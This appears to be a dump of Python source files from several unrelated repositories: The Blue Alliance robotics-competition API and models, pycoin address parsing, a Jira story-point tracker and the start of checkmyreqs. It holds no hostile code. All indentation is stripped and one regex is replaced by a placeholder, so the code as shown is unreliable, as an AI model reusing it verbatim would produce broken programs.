self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/matches', event_key)
def _render(self, event_key):
self._set_event(event_key)
matches = self.event.matches
match_dicts = [ModelToDict.matchConverter(match) for match in matches]
return json.dumps(match_dicts, ensure_ascii=True)
class ApiEventStatsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_stats_controller_{}" # (event_key)
CACHE_VERSION = 0
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventStatsController, self).__init__(*args, **kw)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/stats', event_key)
def _render(self, event_key):
self._set_event(event_key)
return json.dumps(Event.get_by_id(event_key).matchstats)
class ApiEventRankingsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_rankings_controller_{}" # (event_key)
CACHE_VERSION = 0
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventRankingsController, self).__init__(*args, **kw)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/rankings', event_key)
def _render(self, event_key):
self._set_event(event_key)
ranks = json.dumps(Event.get_by_id(event_key).rankings)
if ranks is None or ranks == 'null':
return '[]'
else:
return ranks
class ApiEventAwardsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_awards_controller_{}" # (event_key)
CACHE_VERSION = 3
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventAwardsController, self).__init__(*args, **kw)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/awards', event_key)
def _render(self,event_key):
self._set_event(event_key)
award_dicts = [ModelToDict.awardConverter(award) for award in AwardHelper.organizeAwards(self.event.awards)]
return json.dumps(award_dicts, ensure_ascii=True)
class ApiEventDistrictPointsController(ApiEventController):
CACHE_KEY_FORMAT = "apiv2_event_district_points_controller_{}" # (event_key)
CACHE_VERSION = 0
CACHE_HEADER_LENGTH = 61
def __init__(self, *args, **kw):
super(ApiEventDistrictPointsController, self).__init__(*args, **kw)
self.partial_cache_key = self.CACHE_KEY_FORMAT.format(self.event_key)
def _track_call(self, event_key):
self._track_call_defer('event/district_points', event_key)
def _render(self, event_key):
self._set_event(event_key)
points = DistrictHelper.calculate_event_points(self.event)
return json.dumps(points, ensure_ascii=True)
class ApiEventListController(ApiBaseController):
CACHE_KEY_FORMAT = "apiv2_event_list_controller_{}" # (year)
CACHE_VERSION = 2
CACHE_HEADER_LENGTH = 60 * 60 * 24
def __init__(self, *args, **kw):
super(ApiEventListController, self).__init__(*args, **kw)
self.year = int(self.request.route_kwargs.get("year") or datetime.now().year)
self._partial_cache_key = self.CACHE_KEY_FORMAT.format(self.year)
@property
def _validators(self):
return []
def _track_call(self, *args, **kw):
self._track_call_defer('event/list', self.year)
def _render(self, year=None):
if self.year < 1992 or self.year > datetime.now().year + 1:
self._errors = json.dumps({"404": "No events found for %s" % self.year})
self.abort(404)
events = EventListQuery(self.year).fetch()
event_list = [ModelToDict.eventConverter(event) for event in events]
return json.dumps(event_list, ensure_ascii=True)
```
#### File: parsers/fms_api/fms_api_event_rankings_parser.py
```python
class FMSAPIEventRankingsParser(object):
def parse(self, response):
"""
This currently only works for the 2015 game.
"""
rankings = [['Rank', 'Team', 'Qual Avg', 'Auto', 'Container', 'Coopertition', 'Litter', 'Tote', 'Played']]
for team in response['Rankings']:
rankings.append([
team['rank'],
team['teamNumber'],
team['qualAverage'],
team['autoPoints'],
team['containerPoints'],
team['coopertitionPoints'],
team['litterPoints'],
team['totePoints'],
team['matchesPlayed']])
return rankings if len(rankings) > 1 else None
```
#### File: parsers/fms_api/fms_api_team_details_parser.py
```python
import datetime
import json
import logging
from google.appengine.ext import ndb
from consts.district_type import DistrictType
from models.district_team import DistrictTeam
from models.team import Team
from models.robot import Robot
class FMSAPITeamDetailsParser(object):
def __init__(self, year, team_key):
self.year = year
self.team_key = team_key
def parse(self, response):
"""
Parse team info from FMSAPI
Returns a tuple of models (Team, DistrictTeam, Robot)
"""
# Get team json
# don't need to null check, if error, HTTP code != 200, so we wont' get here
teams = response['teams']
teamData = teams[0]
# concat city/state/country to get address
address = u"{}, {}, {}".format(teamData['city'], teamData['stateProv'], teamData['country'])
team = Team(
team_number=teamData['teamNumber'],
name=teamData['nameFull'],
nickname=teamData['nameShort'],
address=address,
rookie_year=teamData['rookieYear']
)
districtTeam = None
if teamData['districtCode']:
districtAbbrev = DistrictType.abbrevs[teamData['districtCode'].lower()]
districtTeam = DistrictTeam(
id=DistrictTeam.renderKeyName(self.year, districtAbbrev, team.key_name),
team=ndb.Key(Team, team.key_name),
year=self.year,
district=districtAbbrev
)
robot = None
if teamData['robotName']:
robot = Robot(
id=Robot.renderKeyName(team.key_name, self.year),
team=ndb.Key(Team, team.key_name),
year=self.year,
robot_name=teamData['robotName'].strip()
)
return (team, districtTeam, robot)
```
#### File: josephbisch/the-blue-alliance/deploy.py
```python
import os
import sys
def main(argv):
skip_tests = '-s' in argv
os.chdir('../the-blue-alliance-prod')
os.system('git stash') # undoes the application ID change to app.yaml
os.system('git pull origin master')
os.system('git stash pop') # restores the application ID change to app.yaml
test_status = 0
if skip_tests:
print "Skipping tests!"
os.system('paver make')
else:
test_status = os.system('paver preflight')
os.chdir('../')
if test_status == 0:
os.system('python ~/Downloads/google_appengine/appcfg.py --oauth2 update the-blue-alliance-prod/')
else:
print "Tests failed! Did not deploy."
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: helpers/firebase/firebase_pusher.py
```python
import datetime
import json
import logging
import tba_config
import time
from google.appengine.ext import deferred
from google.appengine.api import urlfetch
from models.sitevar import Sitevar
class FirebasePusher(object):
@classmethod
def _get_secret(cls):
firebase_secrets = Sitevar.get_by_id("firebase.secrets")
if firebase_secrets is None:
raise Exception("Missing sitevar: firebase.secrets. Can't write to Firebase.")
return firebase_secrets.contents['FIREBASE_SECRET']
@classmethod
def _delete_data(cls, key):
url = tba_config.CONFIG['firebase-url'].format(key, cls._get_secret())
result = urlfetch.fetch(url, method='DELETE')
if result.status_code != 204:
logging.warning("Error deleting data from Firebase: {}. ERROR {}: {}".format(url, result.status_code, result.content))
@classmethod
def _put_data(cls, key, data_json):
url = tba_config.CONFIG['firebase-url'].format(key, cls._get_secret())
result = urlfetch.fetch(url, payload=data_json, method='PUT')
if result.status_code != 200:
logging.warning("Error pushing data to Firebase: {}; {}. ERROR {}: {}".format(url, data_json, result.status_code, result.content))
@classmethod
def _push_data(cls, key, data_json):
url = tba_config.CONFIG['firebase-url'].format(key, cls._get_secret())
result = urlfetch.fetch(url, payload=data_json, method='POST')
if result.status_code != 200:
logging.warning("Error pushing data to Firebase: {}; {}. ERROR {}: {}".format(url, data_json, result.status_code, result.content))
@classmethod
def match_to_payload_dict(cls, match):
return {'key_name': match.key_name,
'comp_level': match.comp_level,
'match_number': match.match_number,
'set_number': match.set_number,
'alliances': match.alliances,
'winning_alliance': match.winning_alliance,
'order': match.play_order}
@classmethod
def delete_match(cls, match):
payload_key = 'events/{}/matches/{}'.format(match.event.id(), match.key_name)
deferred.defer(cls._delete_data, payload_key, _queue="firebase")
@classmethod
def update_match(cls, match):
payload_key = 'events/{}/matches/{}'.format(match.event.id(), match.key_name)
payload_data_json = json.dumps(cls.match_to_payload_dict(match))
deferred.defer(cls._put_data, payload_key, payload_data_json, _queue="firebase")
@classmethod
def push_notification(cls, notification):
payload_data_json = json.dumps({
'time': datetime.datetime.now().isoformat(),
'payload': notification._render_webhook()
})
deferred.defer(cls._push_data, 'notifications', payload_data_json, _queue="firebase")
```
#### File: the-blue-alliance/helpers/media_helper.py
```python
import json
import logging
import re
from google.appengine.api import urlfetch
from BeautifulSoup import BeautifulSoup
from consts.media_type import MediaType
class MediaHelper(object):
@classmethod
def group_by_slugname(cls, medias):
medias_by_slugname = {}
for media in medias:
slugname = media.slug_name
if slugname in medias_by_slugname:
medias_by_slugname[slugname].append(media)
else:
medias_by_slugname[slugname] = [media]
return medias_by_slugname
class MediaParser(object):
CD_PHOTO_THREAD_URL_PATTERNS = ['chiefdelphi.com/media/photos/']
YOUTUBE_URL_PATTERNS = ['youtube.com', 'youtu.be']
@classmethod
def partial_media_dict_from_url(cls, url):
"""
Takes a url, and turns it into a partial Media object dict
"""
if any(s in url for s in cls.CD_PHOTO_THREAD_URL_PATTERNS):
return cls._partial_media_dict_from_cd_photo_thread(url)
elif any(s in url for s in cls.YOUTUBE_URL_PATTERNS):
return cls._partial_media_dict_from_youtube(url)
else:
logging.warning("Failed to determine media type from url: {}".format(url))
return None
@classmethod
def _partial_media_dict_from_cd_photo_thread(cls, url):
media_dict = {}
media_dict['media_type_enum'] = MediaType.CD_PHOTO_THREAD
foreign_key = cls._parse_cdphotothread_foreign_key(url)
if foreign_key is None:
logging.warning("Failed to determine foreign_key from url: {}".format(url))
return None
media_dict['foreign_key'] = foreign_key
urlfetch_result = urlfetch.fetch(url, deadline=10)
if urlfetch_result.status_code != 200:
logging.warning('Unable to retrieve url: {}'.format(url))
return None
image_partial = cls._parse_cdphotothread_image_partial(urlfetch_result.content)
if image_partial is None:
logging.warning("Failed to determine image_partial from the page: {}".format(url))
return None
media_dict['details_json'] = json.dumps({'image_partial': image_partial})
return media_dict
@classmethod
def _partial_media_dict_from_youtube(cls, url):
media_dict = {}
media_dict['media_type_enum'] = MediaType.YOUTUBE
foreign_key = cls._parse_youtube_foreign_key(url)
if foreign_key is None:
logging.warning("Failed to determine foreign_key from url: {}".format(url))
return None
media_dict['foreign_key'] = foreign_key
return media_dict
@classmethod
def _parse_cdphotothread_foreign_key(cls, url):
regex1 = re.match(r'.*chiefdelphi.com\/media\/photos\/(\d+)', url)
if regex1 is not None:
return regex1.group(1)
else:
return None
@classmethod
def _parse_cdphotothread_image_partial(cls, html):
"""
Input: the HTML from the thread page
ex: http://www.chiefdelphi.com/media/photos/38464,
returns the url of the image in the thread
ex: http://www.chiefdelphi.com/media/img/3f5/3f5db241521ae5f2636ff8460f277997_l.jpg
"""
html = html.decode("utf-8", "replace")
# parse html for the image url
soup = BeautifulSoup(html,
convertEntities=BeautifulSoup.HTML_ENTITIES)
# 2014-07-15: CD doesn't properly escape the photo title, which breaks the find() for cdmLargePic element below
# Fix by removing all instances of the photo title from the HTML
photo_title = soup.find('div', {'id': 'cdm_single_photo_title'}).text
cleaned_soup = BeautifulSoup(html.replace(photo_title, ''),
convertEntities=BeautifulSoup.HTML_ENTITIES)
element = cleaned_soup.find('a', {'target': 'cdmLargePic'})
if element is not None:
partial_url = element['href']
else:
return None
# partial_url looks something like: "/media/img/774/774d98c80dcf656f2431b2e9186f161a_l.jpg"
# we want "774/774d98c80dcf656f2431b2e9186f161a_l.jpg"
image_partial = re.match(r'\/media\/img\/(.*)', partial_url)
if image_partial is not None:
return image_partial.group(1)
else:
return None
@classmethod
def _parse_youtube_foreign_key(cls, url):
youtube_id = None
regex1 = re.match(r".*youtu\.be\/(.*)", url)
if regex1 is not None:
youtube_id = regex1.group(1)
else:
regex2 = re.match(r".*v=([a-zA-Z0-9_-]*)", url)
if regex2 is not None:
youtube_id = regex2.group(1)
if youtube_id is None:
return None
else:
return youtube_id
```
#### File: the-blue-alliance/helpers/team_manipulator.py
```python
from helpers.cache_clearer import CacheClearer
from helpers.manipulator_base import ManipulatorBase
class TeamManipulator(ManipulatorBase):
"""
Handle Team database writes.
"""
@classmethod
def getCacheKeysAndControllers(cls, affected_refs):
return CacheClearer.get_team_cache_keys_and_controllers(affected_refs)
@classmethod
def updateMerge(self, new_team, old_team, auto_union=True):
"""
Given an "old" and a "new" Team object, replace the fields in the
"old" team that are present in the "new" team, but keep fields from
the "old" team that are null in the "new" team.
"""
attrs = [
"address",
"name",
"nickname",
"website",
"rookie_year",
]
for attr in attrs:
if getattr(new_team, attr) is not None:
if getattr(new_team, attr) != getattr(old_team, attr):
setattr(old_team, attr, getattr(new_team, attr))
old_team.dirty = True
# Take the new tpid and tpid_year iff the year is newer than the old one
if (new_team.first_tpid_year > old_team.first_tpid_year):
old_team.first_tpid_year = new_team.first_tpid_year
old_team.first_tpid = new_team.first_tpid
old_team.dirty = True
return old_team
```
#### File: the-blue-alliance/models/event.py
```python
from google.appengine.ext import ndb
import datetime
import json
import pytz
import re
from consts.district_type import DistrictType
from consts.event_type import EventType
class Event(ndb.Model):
"""
Events represent FIRST Robotics Competition events, both official and unofficial.
key_name is like '2010ct'
"""
name = ndb.StringProperty()
event_type_enum = ndb.IntegerProperty(required=True)
short_name = ndb.StringProperty(indexed=False) # Should not contain "Regional" or "Division", like "Hartford"
event_short = ndb.StringProperty(required=True, indexed=False) # Smaller abbreviation like "CT"
year = ndb.IntegerProperty(required=True)
event_district_enum = ndb.IntegerProperty()
start_date = ndb.DateTimeProperty()
end_date = ndb.DateTimeProperty()
venue = ndb.StringProperty(indexed=False)
venue_address = ndb.StringProperty(indexed=False) # We can scrape this.
location = ndb.StringProperty(indexed=False) # in the format "locality, region, country". similar to Team.address
timezone_id = ndb.StringProperty() # such as 'America/Los_Angeles' or 'Asia/Jerusalem'
official = ndb.BooleanProperty(default=False) # Is the event FIRST-official?
first_eid = ndb.StringProperty() # from USFIRST
facebook_eid = ndb.StringProperty(indexed=False) # from Facebook
custom_hashtag = ndb.StringProperty(indexed=False) #Custom HashTag
website = ndb.StringProperty(indexed=False)
webcast_json = ndb.TextProperty(indexed=False) # list of dicts, valid keys include 'type' and 'channel'
matchstats_json = ndb.TextProperty(indexed=False) # for OPR, DPR, CCWM, etc.
rankings_json = ndb.TextProperty(indexed=False)
alliance_selections_json = ndb.TextProperty(indexed=False) # Formatted as: [{'picks': [captain, pick1, pick2, 'frc123', ...], 'declines':[decline1, decline2, ...] }, {'picks': [], 'declines': []}, ... ]
district_points_json = ndb.TextProperty(indexed=False)
created = ndb.DateTimeProperty(auto_now_add=True, indexed=False)
updated = ndb.DateTimeProperty(auto_now=True, indexed=False)
def __init__(self, *args, **kw):
# store set of affected references referenced keys for cache clearing
# keys must be model properties
self._affected_references = {
'key': set(),
'year': set(),
'event_district_abbrev': set(),
'event_district_key': set()
}
self._alliance_selections = None
self._awards = None
self._district_points = None
self._matches = None
self._matchstats = None
self._rankings = None
self._teams = None
self._webcast = None
self._updated_attrs = [] # Used in EventManipulator to track what changed
super(Event, self).__init__(*args, **kw)
@ndb.tasklet
def get_awards_async(self):
from database import award_query
self._awards = yield award_query.EventAwardsQuery(self.key_name).fetch_async()
@property
def alliance_selections(self):
"""
Lazy load alliance_selections JSON
"""
if self._alliance_selections is None:
try:
self._alliance_selections = json.loads(self.alliance_selections_json)
except Exception, e:
self._alliance_selections = None
return self._alliance_selections
@property
def alliance_teams(self):
"""
Load a list of team keys playing in elims
"""
alliances = self.alliance_selections
if alliances is None:
return []
teams = []
for alliance in alliances:
for pick in alliance['picks']:
teams.append(pick)
return teams
@property
def awards(self):
# This import is ugly, and maybe all the models should be in one file again -gregmarra 20121006
from models.award import Award
if self._awards is None:
self.get_awards_async().wait()
return self._awards
@property
def district_points(self):
"""
Lazy load district_points JSON
"""
if self._district_points is None:
try:
self._district_points = json.loads(self.district_points_json)
except Exception, e:
self._district_points = None
return self._district_points
@ndb.tasklet
def get_matches_async(self):
from database import match_query
self._matches = yield match_query.EventMatchesQuery(self.key_name).fetch_async()
@property
def matches(self):
# This import is ugly, and maybe all the models should be in one file again -gregmarra 20121006
from models.match import Match
if self._matches is None:
if self._matches is None:
self.get_matches_async().wait()
return self._matches
def withinDays(self, negative_days_before, days_after):
if not self.start_date or not self.end_date:
return False
now = datetime.datetime.now()
if self.timezone_id is not None:
tz = pytz.timezone(self.timezone_id)
try:
now = now + tz.utcoffset(now)
except pytz.NonExistentTimeError: # may happen during DST
now = now + tz.utcoffset(now + datetime.timedelta(hours=1)) # add offset to get out of non-existant time
after_start = self.start_date.date() + datetime.timedelta(days=negative_days_before) <= now.date()
before_end = self.end_date.date() + datetime.timedelta(days=days_after) >= now.date()
return (after_start and before_end)
@property
def now(self):
if self.timezone_id is not None:
return self.withinDays(0, 0)
else:
return self.within_a_day # overestimate what is "now" if no timezone
@property
def within_a_day(self):
return self.withinDays(-1, 1)
@property
def past(self):
return self.end_date.date() < datetime.date.today() and not self.within_a_day
@property
def future(self):
return self.start_date.date() > datetime.date.today() and not self.within_a_day
@ndb.tasklet
def get_teams_async(self):
from database import team_query
self._teams = yield team_query.EventTeamsQuery(self.key_name).fetch_async()
@property
def teams(self):
if self._teams is None:
self.get_teams_async().wait()
return self._teams
@ndb.toplevel
def prepAwardsMatchesTeams(self):
yield self.get_awards_async(), self.get_matches_async(), self.get_teams_async()
@ndb.toplevel
def prepTeams(self):
yield self.get_teams_async()
@ndb.toplevel
def prepTeamsMatches(self):
yield self.get_matches_async(), self.get_teams_async()
@property
def matchstats(self):
"""
Lazy load parsing matchstats JSON
"""
if self._matchstats is None:
try:
self._matchstats = json.loads(self.matchstats_json)
except Exception, e:
self._matchstats = None
return self._matchstats
@property
def rankings(self):
"""
Lazy load parsing rankings JSON
"""
if self._rankings is None:
try:
self._rankings = json.loads(self.rankings_json)
except Exception, e:
self._rankings = None
return self._rankings
@property
def venue_or_venue_from_address(self):
if self.venue:
return self.venue
else:
try:
return self.venue_address.split('\r\n')[0]
except:
return None
@property
def webcast(self):
"""
Lazy load parsing webcast JSON
"""
if self._webcast is None:
try:
self._webcast = json.loads(self.webcast_json)
except Exception, e:
self._webcast = None
return self._webcast
@property
def key_name(self):
"""
Returns the string of the key_name of the Event object before writing it.
"""
return str(self.year) + self.event_short
@property
def facebook_event_url(self):
"""
Return a string of the Facebook Event URL.
"""
return "http://www.facebook.com/event.php?eid=%s" % self.facebook_eid
@property
def details_url(self):
"""
Returns the URL pattern for the link to this Event on TBA
"""
return "/event/%s" % self.key_name
@property
def gameday_url(self):
"""
Returns the URL pattern for the link to watch webcasts in Gameday
"""
if self.webcast:
gameday_link = '/gameday'
view_num = 0
for webcast in self.webcast:
if view_num == 0:
gameday_link += '#'
else:
gameday_link += '&'
if 'type' in webcast and 'channel' in webcast:
gameday_link += 'view_' + str(view_num) + '=' + self.key_name + '-' + str(view_num + 1)
view_num += 1
return gameday_link
else:
return None
@property
def hashtag(self):
"""
Return the hashtag used for the event.
"""
if self.custom_hashtag:
return self.custom_hashtag
else:
return "frc" + self.event_short
# Depreciated, still here to keep GAE clean.
webcast_url = ndb.StringProperty(indexed=False)
@classmethod
def validate_key_name(self, event_key):
key_name_regex = re.compile(r'^[<KEY>')
match = re.match(key_name_regex, event_key)
return True if match else False
@property
def event_district_str(self):
return DistrictType.type_names.get(self.event_district_enum, None)
@property
def event_district_abbrev(self):
return DistrictType.type_abbrevs.get(self.event_district_enum, None)
@property
def event_district_key(self):
district_abbrev = DistrictType.type_abbrevs.get(self.event_district_enum, None)
if district_abbrev is None:
return None
else:
return '{}{}'.format(self.year, district_abbrev)
@property
def event_type_str(self):
return EventType.type_names[self.event_type_enum]
```
#### File: josephbisch/the-blue-alliance/pavement.py
```python
import subprocess
import json
import time
from paver.easy import *
path = path("./")
@task
def deploy():
sh("python deploy.py")
@task
def javascript():
"""Combine Compress Javascript"""
print("Combining and Compressing Javascript")
sh("python do_compress.py js")
@task
def less():
"""Build and Combine CSS"""
print("Building and Combining CSS")
sh("lessc static/css/less_css/tba_style.main.less static/css/less_css/tba_style.main.css")
sh("lessc static/css/less_css/tba_style.gameday.less static/css/less_css/tba_style.gameday.css")
sh("python do_compress.py css")
@task
def lint():
sh("python linter.py")
@task
def make():
javascript()
less()
git_branch_name = subprocess.check_output(["git", "rev-parse", "--abbrev-ref", "HEAD"])
git_last_commit = subprocess.check_output(["git", "log", "-1"])
build_time = time.ctime()
data = {'git_branch_name': git_branch_name,
'git_last_commit': git_last_commit,
'build_time': build_time}
with open('version_info.json', 'w') as f:
f.write(json.dumps(data))
@task
def preflight():
"""Prep a prod push"""
test_function([])
make()
@task
def setup():
"""Set up for development environments."""
setup_function()
@task
@consume_args
def test(args):
"""Run tests. Accepts an argument to match subnames of tests"""
test_function(args)
@task
def test_fast():
"""Run tests that don't require HTTP"""
print("Running Fast Tests")
sh("python run_tests.py --test_pattern=test_math_*.py")
sh("python run_tests.py --test_pattern=test_*parser*.py")
sh("python run_tests.py --test_pattern=test_*manipulator.py")
sh("python run_tests.py --test_pattern=test_*api.py")
sh("python run_tests.py --test_pattern=test_event.py")
sh("python run_tests.py --test_pattern=test_match_cleanup.py")
sh("python run_tests.py --test_pattern=test_event_group_by_week.py")
sh("python run_tests.py --test_pattern=test_event_team_repairer.py")
sh("python run_tests.py --test_pattern=test_event_team_updater.py")
sh("python run_tests.py --test_pattern=test_event_get_short_name.py")
def setup_function():
make()
def test_function(args):
print("Running Tests")
test_pattern = ""
if len(args) > 0:
test_pattern = " --test_pattern=*%s*" % args[0]
sh("python run_tests.py%s 2> test_failures.temp" % test_pattern)
```
#### File: the-blue-alliance/tests/test_datafeed_usfirst_matches.py
```python
import unittest2
import datetime
from google.appengine.ext import db
from google.appengine.ext import testbed
from datafeeds.datafeed_usfirst import DatafeedUsfirst
from models.event import Event
class TestDatafeedUsfirstMatches(unittest2.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_urlfetch_stub()
self.testbed.init_datastore_v3_stub()
self.testbed.init_memcache_stub()
self.datafeed = DatafeedUsfirst()
def tearDown(self):
self.testbed.deactivate()
def test_getMatchResultsList(self):
event = Event(
id="2011ct",
event_short="ct",
year=2011
)
matches = self.datafeed.getMatches(event)
# Test 2011ct_qm1
match = matches[0]
self.assertEqual(match.comp_level, "qm")
self.assertEqual(match.set_number, 1)
self.assertEqual(match.match_number, 1)
self.assertEqual(match.team_key_names, [u'frc69', u'frc571', u'frc176', u'frc3464', u'frc20', u'frc1073'])
self.assertEqual(match.alliances_json, """{"blue": {"score": 57, "teams": ["frc3464", "frc20", "frc1073"]}, "red": {"score": 74, "teams": ["frc69", "frc571", "frc176"]}}""")
self.assertEqual(match.time_string, "9:29 AM")
# Test 2011ct_qf2m3
match = matches[-7]
self.assertEqual(match.comp_level, "qf")
self.assertEqual(match.set_number, 2)
self.assertEqual(match.match_number, 3)
self.assertEqual(match.team_key_names, [u'frc716', u'frc3125', u'frc181', u'frc1699', u'frc1124', u'frc714'])
self.assertEqual(match.alliances_json, """{"blue": {"score": 74, "teams": ["frc1699", "frc1124", "frc714"]}, "red": {"score": 90, "teams": ["frc716", "frc3125", "frc181"]}}""")
self.assertEqual(match.time_string, "2:05 PM")
# Test 2011ct_f1m2
match = matches[-1]
self.assertEqual(match.comp_level, "f")
self.assertEqual(match.set_number, 1)
self.assertEqual(match.match_number, 2)
self.assertEqual(match.team_key_names, [u'frc195', u'frc1923', u'frc155', u'frc177', u'frc175', u'frc1073'])
self.assertEqual(match.alliances_json, """{"blue": {"score": 65, "teams": ["frc177", "frc175", "frc1073"]}, "red": {"score": 97, "teams": ["frc195", "frc1923", "frc155"]}}""")
self.assertEqual(match.time_string, "3:23 PM")
``` |
{
"source": "JosephBless/pycoin",
"score": 3
} |
#### File: pycoin/networks/parseable_str.py
```python
from pycoin.encoding.b58 import a2b_base58
from pycoin.encoding.hash import double_sha256
from pycoin.contrib import bech32m
from pycoin.intbytes import int2byte
class parseable_str(str):
"""
This is a subclass of str which allows caching of parsed base58 and bech32
data (or really anything) to eliminate the need to repeatedly run slow parsing
code when checking validity for multiple types.
"""
def __new__(self, s):
if isinstance(s, parseable_str):
return s
return str.__new__(self, s)
def __init__(self, s):
super(str, self).__init__()
if isinstance(s, parseable_str):
self._cache = s._cache
else:
self._cache = {}
def cache(self, key, f):
if key not in self._cache:
self._cache[key] = None
try:
self._cache[key] = f(self)
except Exception:
pass
return self._cache[key]
def parse_b58(s):
s = parseable_str(s)
return s.cache("b58", a2b_base58)
def b58_double_sha256(s):
data = parse_b58(s)
if data:
data, the_hash = data[:-4], data[-4:]
if double_sha256(data)[:4] == the_hash:
return data
def parse_b58_double_sha256(s):
s = parseable_str(s)
return s.cache("b58_double_sha256", b58_double_sha256)
def parse_bech32_or_32m(s):
triple = bech32m.bech32_decode(s)
if triple is None or triple[1] is None:
return None
hr_prefix = triple[0]
data = triple[1]
spec = triple[2]
version = data[0]
decoded = bech32m.convertbits(data[1:], 5, 8, False)
decoded_data = b''.join(int2byte(d) for d in decoded)
rv = (hr_prefix, version, decoded_data, spec)
return rv
def parse_bech32(s):
s = parseable_str(s)
return s.cache("bech32", parse_bech32_or_32m)
def parse_colon_prefix(s):
s = parseable_str(s)
return s.cache("colon_prefix", lambda _: _.split(":", 1))
``` |
{
"source": "josephbmanley/jira-tracker",
"score": 3
} |
#### File: jira-tracker/jira_tracker/project_tracker.py
```python
from jira_tracker.logger import logger
from jira_tracker.tracker_issue import TrackerIssue
import datetime
class ProjectTracker:
def __init__(self, jira_client, project_key):
self.jira = jira_client
self.key = project_key
def this_weeks_issues(self):
result = self.jira.search_issues(
f"project = {self.key} AND assignee = currentuser() AND ((resolutiondate >= -{datetime.datetime.today().weekday()}d AND status = Done) OR status != Done)"
)
logger.debug(f"Found {len(result)} valid records this week in {self.key}")
issues = []
for issue in result:
issues.append(TrackerIssue(issue))
return issues
```
#### File: josephbmanley/jira-tracker/setup.py
```python
import re
from os import path
from setuptools import setup
from codecs import open
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
def read(*parts):
return open(path.join(here, *parts), 'r').read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^version = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name='jira-tracker',
version=find_version('jira_tracker','__init__.py'),
description='Simple Jira story point tracking tool',
long_description=long_description,
long_description_content_type="text/markdown",
# The project's main homepage.
url='https://github.com/josephbmanley/jira-tracker',
# Author details
author='<NAME>',
author_email='<EMAIL>',
# Choose your license
license='MIT',
# See https://pypi.org/classifiers/
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9'
],
keywords='Jira',
packages=['jira_tracker'],
install_requires=['argparse','jira','pyyaml','wheel'],
package_data={},
entry_points={
'console_scripts' : [
'jira-tracker=jira_tracker:main'
]
}
)
``` |
{
"source": "joseph-bongo-220/DeepLearningProject",
"score": 3
} |
#### File: joseph-bongo-220/DeepLearningProject/preprocess.py
```python
import os
import numpy as np
from imageio import imread, imwrite
from skimage import img_as_ubyte
from skimage.transform import resize
from tqdm import tqdm
import boto3
import re
def crop_border(img):
"""crop black borders of images, relevant for Montgomery images"""
mask = img > 0
# Keeps rows and columns of images if they are not completely black
return img[np.ix_(mask.any(1), mask.any(0))]
def find_edge(img):
"""finds the larger edge for cropping"""
y, x = img.shape
return y if y < x else x
def crop_image(img, size):
"""Crops the image size so can extract the central part"""
y, x = img.shape
startx = (x - size) // 2
starty = (y - size) // 2
return img[starty:starty + size, startx: startx + size]
def preprocess(imgdir, outdir, size=512):
"""full preprocessing, takes input and output directory"""
files = sorted(os.listdir(imgdir))
num_imgs = len(files)
for i, file in enumerate(tqdm(files)):
input_path = os.path.join(imgdir, file)
output_path = os.path.join(outdir, file)
img = imread(input_path, as_gray=True)
img_clean_border = crop_border(img)
edge = find_edge(img_clean_border)
cropped_image = crop_image(img_clean_border, edge)
final_img = resize(cropped_image, (size,size), order=3)
final_img = img_as_ubyte(final_img/255.0)
imwrite(output_path, final_img)
def get_s3_keys(client, bucket, file_type = "png"):
"""Get a list of keys in an S3 bucket."""
keys = []
resp = client.list_objects_v2(Bucket=bucket)
for obj in resp['Contents']:
if re.search("[.]" + file_type + "$", obj['Key']):
keys.append(obj['Key'])
return keys
def preprocess_s3(bucket, outdir, size=512):
"""same as preprocessing, but using data stored on an S3 bucket"""
s3 = boto3.client("s3")
files = get_s3_keys(s3, bucket)
num_imgs = len(files)
for i, file in enumerate(tqdm(files)):
# get file name
name = re.findall("(?<=/)[^/]*", file)[-1]
output_path = outdir+"/"+name
s3.download_file("yale-amth552-deep-learning", file, name)
img = imread(name, as_gray=True)
img_clean_border = crop_border(img)
edge = find_edge(img_clean_border)
cropped_image = crop_image(img_clean_border, edge)
final_img = resize(cropped_image, (size,size), order=3)
final_img = img_as_ubyte(final_img/255.0)
imwrite(name, final_img)
s3.upload_file(name, bucket, output_path)
os.remove(name)
if __name__ == '__main__':
preprocess_s3("yale-amth552-deep-learning", 'Cropped')
``` |
{
"source": "josephbosire/checkmyreqs",
"score": 3
} |
#### File: josephbosire/checkmyreqs/checkmyreqs.py
```python
from __future__ import print_function
import argparse
import os
import re
import sys
import errno
import csv
from blessings import Terminal
TERMINAL = Terminal()
try:
# Different location in Python 3
from xmlrpc.client import ServerProxy
except ImportError:
from xmlrpclib import ServerProxy
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
CLIENT = ServerProxy('http://pypi.python.org/pypi')
IGNORED_PREFIXES = ['#', 'git+', 'hg+', 'svn+', 'bzr+', '\n', '\r\n']
IS_COMPATIBLE = 'yes'
NOT_COMPATIBLE = 'no'
UNKOWN = 'No Info Available'
NOT_IN_PYPI = 'Not in pypi'
